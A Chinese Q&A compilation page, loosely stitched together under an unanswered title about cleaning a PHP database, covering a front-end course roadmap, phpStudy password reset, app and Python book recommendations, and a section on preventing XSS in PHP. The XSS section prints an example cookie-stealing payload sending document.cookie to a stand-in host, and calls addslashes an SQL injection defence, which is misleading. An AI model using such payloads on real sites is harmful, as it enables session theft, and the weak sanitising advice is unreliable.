php数据库怎么清理

1、php数据库怎么清理，前端开发怎么入门？

建议你跟着黑马程序员web前端中级程序员学习路线图来学习，含配套视频，前端工具，源码等。

黑马程序员学习路线图及能掌握的能力（总，以下会分阶段，加上配套学习视频，小伙伴可继续往下看！）

第一阶段：HTML5+css

第二阶段：移动web网页开发

第三阶段：JavaScript网页编程

第四阶段：Node.js与Ajax

第五阶段：vue.js项目实战

第六阶段：微信小程序

第七阶段：React.js项目实战

第八阶段：框架阶段与原理

第九阶段：移动APP开发

第十阶段：node.js进阶

第十一阶段：可视化游戏

第十二段阶段：架构与运维

关注私信获取视频哦！

2、如何重置phpstudy数据库密码忘记密码？

修改数据库的密码方法如下：

使用『其他选项菜单』-『MySQL设置』-『设置或修改密码』 。

重置MySQL密码(忘记密码时使用)

请使用『其他选项菜单』-『MySQL工具』-『重置密码』。

3、有哪些好用的软件值得推荐？

良心推荐：

1、DPS设计印刷分享软件，一个国产的排版印刷软件，电脑软件。排版功能参照AI、COREDRAW、Indesign设计，操作界面模拟word，精剪操作步骤，比如同一个效果在其它软件里不使用快捷键可能要操作三四步，在DPS里一步可以实现。内置海量的背景图片和素材，也有许多模板，主要面向不是美编设计师的普通大众用户开发，很容易上手，可以相对方便地设计出专业书刊画册、报纸、作文集手抄报简历、相册、台历、明信片、艺术微喷、贺卡请柬、名片、传单、折页、海报、宣传册、易拉宝、门型展架、X型展架、优惠券blabla...各种各样类型的印刷品。

这个软件下载安装不需要序列号激活或者购买，排版素材也完全免费，只有在需要将文件印刷时才收取印刷费用。

根据制作的相应品类选择创建对应的文件格式，选择需要的参数新建文件，非常方便，还可以先查看对应的印刷报价

排版界面只要会用word的可以直接上手了，有一些操作的细微差别看一下教程也是秒懂，

创建的文件会标注清楚每个版面被会裁切到的出血位、书脊宽度等，底下的导航栏可以快速切换到想看的页面

支持导入PDF解组排版，导入CDR、INDESIGN等矢量文件直接排版

弄一个这样造型的图片不用20秒，具体可以参照我另一篇悟空解答《有什么软件能把图片裁剪成圆形或六角、八角等形状的？》

排版完成后可以一键生成3D电子书，网页端和手机端都能分享传阅，手机横屏可以看到整本书翻阅效果，还能看到阅读数、点赞和留言。也可以将文件导出JPG图片

作品展厅有大量其它用户作品生成的3D电子书供排版参考

如果需要将文件制作成实物，可以在系统内直接下单印刷，自助选择纸张、印刷工艺和制作方式，自行通过微信或支付宝支付，清晰明了，一本起印，快递到家。有打印机的可以系统内直接打印小样校对。印刷文件储存在云端，下次需要可以继续印刷或者下载修改。

已经制作好的文件可以直接在系统内报价下单印刷，像画册、书、杂志这种多页的文件，用户可以在系统内自行盖章确认封面封底封2封三，3D预览确认页序后交付印刷，节省了跟印刷公司反复沟通还担心人家放错位置的复杂过程。

图文快印功能也超良心，想要打印、复印的文件直接在系统内上传文件下单，就近匹配到离你最近的快印店，交几块钱送货费，会有跑腿上门送货，费事大热天满大街找打印店了

2、VSCO

摄影App，很多摄影师都在用，包含了相机拍照、照片编辑和照片分享三大功能。各种高大上滤镜，还可以很大限度自行处理照片的曝光度、对比度、拉直、裁剪、X-偏斜、Y-偏斜、锐化、清晰度、饱和度、高亮、阴影、色温、色调肤色、晕影、颗粒、褪色、阴影色调、高亮色调。可以直接导出高清大图，操作一点难度都没有，还免费！

3.VUE

超文艺的手机视频神器，普通视频都能做出电影质感。内置了多款滤镜可左右滑动选择并实时显示效果；支持前置、后置摄像头拍摄，使用前置摄像头时还会非常贴心地默认开启无暇模式；分镜数、时长和画幅也都能自行调整。可以从一个或多个视频源导入内容，每个分镜的开始时间、滤镜、变焦效果等都可以分别修改，还能对剪辑后的视频做整体对比度、饱和度等调整。每个分镜加入字幕，消除背景声加入内置音乐或手机音频，最后还能贴上各种漂亮标签

4、如何自学Python？

如果题主对基础的编程知识有一些了解，但还没有开始系统地学习Python。不过，既然题主的目标很明确（将Python作为一种工具来提高工作效率，比如爬取数据），那么，接下来制定学习计划就比较简单了。

无论题主是否已经学习了一些其他的编程语言，在开始学习Python时，都应该先从Python的基本概念学起，这样在之后的编程实战中就能尽量减少因为不熟悉语言机制而出现的错误。

《Python编程：从入门到实践》，作者：Eric Matthes，译者：袁国忠

这是一本Python入门书，共分为入门和实践两个部分：第一部分介绍了Python编程的基本概念，包括matplotlib、NumPy和Pygal等强大的Python库和工具介绍，以及列表、字典、if语句、类、文件与异常、代码测试等内容；第二部分通过三个项目（Python 2D游戏开发，利用数据生成交互式信息图，以及创建和定制简单的Web应用）将理论付诸于实践。帮助读者理解Python编程的概念及用途。使用Python 2或Python 3的读者都可以利用这本书来学习。

《Python编程快速上手——让繁琐工作自动化》，作者：[美] Al Sweigart 斯维加特，译者：王海鹏

这本书致力于教大家利用Python 编程，在几分钟内完成手工需要几小时的工作。比如：在一个文件或多个文件中搜索文本；创建、更新、移动和重命名文件和文件夹；搜索网页和下载的在线内容；在任意大小的Excel电子表格中更新和格式化数据……这本书一步一步地引导你完成每个程序，并用你学到的新技能来让类似的任务自动化。你不用再浪费时间去做任何可以自动化的工作。即使你从未写过一行代码，也可以让计算机来做繁重的工作。在学习爬虫以前，可以先利用这些小功能来体会一下Python编程带来的便利。

《Python基础教程 第3版》，作者：[挪]Magnus Lie Hetland，译者：袁国忠

这本书专门针对Python 3进行讲解，包括了Python程序设计的方方面面：从列表、元组等基础概念，到抽象、异常等相对高级的话题，再到将Python与数据库、网络、C语言等工具结合使用，Python程序的测试、打包和发布。最后，这本书按照实际项目开发的步骤向读者介绍了10个具有实际意义的Python项目的开发过程，供读者练习并体会代码功能。

仅仅学习一些分散的基础知识还不能让你熟练地开发一个综合功能，最好能利用几个通用的应用来体会Python语言中各种知识点的应用场景，并将其融会贯通，举一反三。

《Python核心编程（第3版）》，作者:[美]Wesley Chun，译者：孙波翔 李斌 李晗

这本书是经典畅销图书《Python核心编程（第二版）》的全新升级版本，全书共分为3部分。第1部分讲解了Python的一些通用应用，包括正则表达式、网络编程、Internet客户端编程等内容；第2部分讲解了与Web开发相关的主题；第3部分则包括文本处理以及一些其他内容。适合具有一定基础的Python开发人员作为进阶教程来学习。

既然题主想利用Python从网上爬取数据，那么阅读一些网络爬虫方面的书籍就非常有必要了。

《Python 3网络爬虫开发实战》，作者：崔庆才

这本书介绍了如何利用Python 3开发网络爬虫，书中讨论了urllib、requests、正则表达式、Beautiful Soup、XPath、pyquery、数据存储、Ajax数据爬取等内容，接着通过多个案例介绍了不同场景下如何实现数据爬取，最后介绍了pyspider框架、Scrapy框架和分布式爬虫，适合Python程序员阅读。

得益于Python强大而丰富的库以及数据分析能力，Python在神经网络、深度学习等方面都已经有了成熟的包可供调用。除了网络爬虫以外，题主也可以对Python在其他方向的应用进行扩展学习。

《Python神经网络编程》，作者：[英]塔里克·拉希德，译者：林

这本书从简单的思路着手，利用Python语言详细介绍了神经网络工作所须的基础知识，共包括三部分：第1部分介绍基本的思路，包括神经网络底层的数学知识，第2部分介绍了学习Python编程的流行方法，并使用Python构建神经网络，让其像专家所开发的网络那样工作（如手写字母的识别）。第3部分扩展介绍了如何将神经网络的性能提升到工业应用的层级，甚至让其在Raspberry Pi（树莓派，一款单板计算机）上工作。

这几本书基本覆盖了从学习基础概念到利用Python完成实际工作的完整学习路线，建议题主根据自己的程度进行针对性的学习。不必急于求成，毕竟在学习过程中的每一条bug都可能让你学到一点新技能。

更多关于IT/经管/心理学精彩内容和图书推荐请关注@人民邮电出版社哦！

5、PHP如何防止XSS攻击？

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。

HTML是一种超文本标记语言，通过将一些字符特殊地对待来区别文本和标记，例如，小于符号（<）被看作是HTML标签的开始，<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符（如<）时，用户浏览器会将其误认为是插入了HTML标签，当这些HTML标签引入了一段JavaScript脚本时，这些脚本程序就将会在用户浏览器中执行。所以，当这些特殊字符不能被动态页面检查或检查出现失误时，就将会产生XSS漏洞。

当然我会将标题设计的非常吸引人点击，比如 “陈冠希艳照又有流出2012版(20P无码)” ，这样如果我将里面的alert换成恶意代码，比如：

location.href='http://www.xss.com?cookie='+document.cookie’；或者<a href='http://www.xss.com?cookie='+document.cookie>。用户的cookie我也拿到了，如果服务端session没有设置过期的话，我以后甚至拿这个cookie而不需用户名密码，就可以以这个用户的身份登录成功了。

预防XSS攻击

从根本上说，解决办法是消除网站的XSS漏洞，这就需要网站开发者运用转义安全字符等手段，始终把安全放在心上。

简单点，就是过滤从表单提交来的数据，使用php过滤函数就可以达到很好的目的。

htmlspecialchars() 函数

代码实例：

<?php

if (isset($_POST['name'])){

$str = trim($_POST['name']); //清理空格

$str = strip_tags($str); //过滤html标签

$str = htmlspecialchars($str); //将字符内容转化为html实体

$str = addslashes($str); //防止SQL注入

echo $str;

}

?>

<form method="post" action="">

<input name="name" type="text">

<input type="submit" value="提交" >

</form>

具体操作无法一一写出，需要你边实践边摸索